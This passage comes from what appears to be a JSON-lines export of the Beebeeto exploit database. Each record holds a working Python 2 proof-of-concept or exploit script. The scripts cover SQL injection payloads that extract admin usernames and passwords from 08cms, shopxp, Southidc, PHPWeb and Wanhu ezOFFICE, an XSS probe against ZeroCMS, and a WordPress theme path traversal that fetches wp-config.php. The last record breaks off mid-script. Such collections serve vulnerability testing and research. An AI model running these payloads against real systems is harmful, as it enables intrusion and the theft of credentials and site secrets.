{\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '08cms', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['3.1'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection',# \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['SQL Injection', '08cms\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': '\u6f0f\u6d1e\u51fa\u73b0\u5728/include/paygate/alipay/pays.php\u6587\u4ef6', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.cnseay.com/3333/'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 
(\"/include/paygate/alipay/pays.php?out_trade_no=22'%20AND%20(SELECT%201%20\"\r\n \"FROM(SELECT%20COUNT(*),CONCAT((SELECT%20concat(0x3a,mname,0x3a,password,\"\r\n \"0x3a,email,0x3a)%20from%20cms_members%20limit%200,1),FLOOR(RAND(0)*2))X%20\"\r\n \"FROM%20information_schema.tables%20GROUP%20BY%20X)a)%20AND'\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r\".*?Duplicate\\s*entry\\s*[']:(?P<username>[^:]+):(?P<password>[^:]+)\", re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u6f0f\u6d1e\u51fa\u73b0\u5728/include/paygate/alipay/pays.php\u6587\u4ef6", "app_name": "08cms", "id": "poc-2014-0043", "layer4_protocol": null}
{"create_date": "2014-09-30 21:03:29", "name": "shopxp v7.4 /textbox2.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection, shopxp\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0040', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'shopxp v7.4 /textbox2.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-29', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'xpshop', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['7.4'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['SQL Injection', 'shopxp\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'N/A', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.webshell.cc/1154.html'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select\"\r\n \"%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin\")\r\n verify_url = args['options']['target'] + payload\r\n if 
args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r'.*?<body[^>]*?>(?P<account>[^<>]*?)</body>',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None or match.group('account').strip()==\"\":\r\n args['success'] = False\r\n return args\r\n account = match.group('account').strip()\r\n username = account[:-16]\r\n password = account[-16:]\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0040", "layer4_protocol": null}
{"create_date": "2014-09-29 15:55:32", "name": "ZeroCMS 1.0 /zero_transact_user.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "ZeroCMS,xss,\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0039',\r\n 'name': 'ZeroCMS 1.0 /zero_transact_user.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-09-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ZeroCMS', \r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['ZeroCMS', 'xss', '\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e'],\r\n 'desc': 'ZeroCMS\u7528\u6237\u6ce8\u518c\u9875\u9762zero_transact_user.php\u8868\u5355\u5b8c\u5168\u6ca1\u8fdb\u884c\u8fc7\u6ee4\u3002',\r\n 'references': ['http://www.exploit-db.com/exploits/34170/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/zero_transact_user.php'\r\n verify_data = 'name=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&email=%3Cscript%3E'\\\r\n 'alert%28123%29%3C%2Fscript%3E&password_1=%3Cscript%3Ealert%28123%29%3C%2Fscript'\\\r\n '%3E&password_2=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&action=Create+Account'\r\n request = urllib2.Request(verify_url, data=verify_data)\r\n response = urllib2.urlopen(request)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + 
verify_url\r\n print '[*] POST: ' + verify_data\r\n content = response.read()\r\n if \"Duplicate entry '<script>alert(123)</script>' for key 'email'\" in content:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "ZeroCMS\u7528\u6237\u6ce8\u518c\u9875\u9762zero_transact_user.php\u8868\u5355\u5b8c\u5168\u6ca1\u8fdb\u884c\u8fc7\u6ee4\u3002", "app_name": "ZeroCMS", "id": "poc-2014-0039", "layer4_protocol": null}
{"create_date": "2014-09-29 14:45:51", "name": "Southidc\u5357\u65b9\u6570\u636e v11.0 /NewsType.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "southidc,SQL\u6ce8\u5165\u6f0f\u6d1e,SQL Injection,\u5357\u65b9\u6570\u636e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0036', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Southidc\u5357\u65b9\u6570\u636e v11.0 /NewsType.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-28', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'southidc', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['11.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['southidc', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'SQL Injection', '\u5357\u65b9\u6570\u636e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'southidc v10.0\u5230v11.0\u7248\u672c\u4e2dNewsType.asp\u6587\u4ef6\u5bf9SmallClass\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': 
['http://sebug.net/vuldb/ssvid-62399'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n exp = (\"/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword\"\r\n \",2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201\"\r\n \"=2%20and%20''='\")\r\n verify_url = args['options']['target'] + exp\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r'.*?\\\">(?P<username>[a-zA-Z0-9]+)\\|(?P<password>[a-zA-Z0-9]+)',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "southidc v10.0\u5230v11.0\u7248\u672c\u4e2dNewsType.asp\u6587\u4ef6\u5bf9SmallClass\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "Southidc", "id": "poc-2014-0036", "layer4_protocol": null}
{"create_date": "2014-09-28 16:06:23", "name": "PHPWeb 2.0.5 \u4f2a\u9759\u6001 SQL\u6ce8\u5165 POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "phpweb,SQL Injection,phpweb\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0034', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'PHPWeb 2.0.5 \u4f2a\u9759\u6001 SQL\u6ce8\u5165 POC', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-28', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPWeb', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.0.5'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['phpweb', 'SQL Injection', 'phpweb\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'N/A', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://blog.163.com/sjg_admin/blog/static/22682017120139192446513/'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + 
\"/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n if content:\r\n pattern = re.compile(r\".*?Duplicate\\s*entry\\s*[']?[0-9]*:(?P<username>[^:]+):(?P<password>[^:]+)\",re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group('username')\r\n password = match.group('password')\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "phpweb", "id": "poc-2014-0034", "layer4_protocol": null}
{"create_date": "2014-09-27 16:42:03", "name": "\u6821\u65e0\u5fe7\u5efa\u7ad9\u7cfb\u7edf /TeachView.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beeOver", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Xiao5u,TeachView.asp,Sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport time\r\nimport urllib2\r\nimport urllib\r\nimport cookielib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0032',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': '\u6821\u65e0\u5fe7\u5efa\u7ad9\u7cfb\u7edf /TeachView.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'beeOver', # \u4f5c\u8005\r\n 'create_date': '2014-09-26', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Xiao5u', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['\u975e\u5546\u4e1a\u6388\u6743\u6240\u6709\u7248\u672c'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Xiao5u', 'TeachView.asp', 'Sql injection'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Xiao5u cms website have sql injection error.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-065350', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def 
verify(cls, args):\r\n attack_url_base = args['options']['target'] + \"/TeachView.asp\"\r\n attack_url = attack_url_base + \"?id=99999999999%27\"\r\n user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'}\r\n request = urllib2.Request(attack_url,headers=user_agent)\r\n error_string = \"Microsoft OLE DB Provider for ODBC Drivers\"\r\n error_num = \"80040e14\"\r\n error_detail = \"[Microsoft][ODBC Microsoft Access Driver]\"\r\n\r\n try:\r\n response = urllib2.urlopen(request)\r\n except urllib2.URLError as e:\r\n if hasattr(e, 'code'):\r\n if e.getcode() == 500:\r\n content = e.read()\r\n if error_num in content and error_string in content and error_detail in content:\r\n #\u5982\u679c\u62a5500\u9519\u8bef\u4e14\u51fa\u73b0\"[Microsoft][ODBC Microsoft Access Driver] \u5b57\u7b26\u4e32\u7684\u8bed\u6cd5\u9519\u8bef \u5728\u67e5\u8be2\u8868\u8fbe\u5f0f 'id=59'' \u4e2d\u3002\"\u5219\u8bf4\u660e\u6f0f\u6d1e\u5b58\u5728\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = attack_url\r\n args['poc_ret']['tips'] = \"This website must have vulnerabilities, you can use sqlmap detect to get more information. \"\r\n #\u5982\u679c\u6f0f\u6d1e\u5b58\u5728\uff0c\u5219\u5efa\u8bae\u4f7f\u7528sqlmap\u7b49\u5de5\u5177\u8fdb\u884c\u8be6\u7ec6\u7684\u68c0\u6d4b\r\n return args\r\n\r\n args[\"success\"] = False\r\n args['poc_ret']['tips'] = \"May be this website not have this bug.\"\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Xiao5u cms website have sql injection error.", "app_name": "Other", "id": "poc-2014-0032", "layer4_protocol": null}
{"create_date": "2014-09-25 17:46:15", "name": "Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "W_HHH", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Wanhu,Wanhu-ezOFFICE", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2,urllib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0030', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'W_HHH', # \u4f5c\u8005\r\n 'create_date': '2014-09-25', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wanhu-ezOFFICE', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['*'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Wanhu', 'Wanhu-ezOFFICE'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-064324/', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @staticmethod\r\n def post(url, data):\r\n req = urllib2.Request(url)\r\n data = urllib.urlencode(data)\r\n #enable 
cookie\r\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())\r\n response = opener.open(req, data)\r\n return response.read()\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_path = \"/defaultroot/GraphReportAction.do?action=showResult\"\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n reinfo = '<textarea name=\"dataSQL\" rows=\"5\" style=\"width:100%\" readonly></textarea>'\r\n response = urllib2.urlopen(verify_url).read()\r\n match_hash = re.compile(reinfo)\r\n form_hash = match_hash.findall(response)\r\n if not form_hash:\r\n args['success'] = False\r\n return args\r\n\r\n # execution sql\r\n payload = {'dataSQL' : 'select USERACCOUNTS,USERPASSWORD from org_employee where EMP_ID=0'}\r\n response = cls.post(verify_url, payload)\r\n match_hash = re.compile('<td class=\"listTableLine2\">.*?</td>')\r\n form_hash = match_hash.findall(response)\r\n if len(form_hash) != 2:\r\n args['success'] = False\r\n return args\r\n\r\n # get admin user and password\r\n args['success'] = True\r\n args['poc_ret']['Admin-username'] = form_hash[0][form_hash[0].find('\">') + 2:].rstrip('</td>')\r\n args['poc_ret']['Admin-password'] = form_hash[1][form_hash[0].find('\">') + 2:].rstrip('</td>')\r\n\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0030", "layer4_protocol": null}
{"create_date": "2014-09-25 14:40:55", "name": "Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "t0nyhj", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress,Presuasion Theme,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0029', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC', # \u540d\u79f0\r\n 'author': 't0nyhj', # \u4f5c\u8005\r\n 'create_date': '2014-09-25', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\u6240\u4f7f\u7528\u7684\u7b2c\u4e09\u5c42\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress Persuasion Theme', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.x'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Arbitrary File Download', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Wordpress', 'Persuasion Theme', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d 
\uff0c\u901a\u8fc7\u6b64\u6f0f\u6d1e\u53ef\u4ee5\u4e0b\u8f7d\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.exploit-db.com/exploits/30443/', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args): # \u5b9e\u73b0\u9a8c\u8bc1\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n vul_url = '{url}/wp-content/themes/persuasion/lib/scripts/dl-skin.php'.format(url=args['options']['target'])\r\n payload = {'_mysite_download_skin':'../../../../../wp-config.php', '_mysite_delete_skin_zip':''}\r\n data = urllib.urlencode(payload)\r\n if args['options']['verbose']:\r\n print '[*] {url} - Getting wp-config.php ...'.format(url=args['options']['target'])\r\n req = urllib2.Request(vul_url, data)\r\n response = 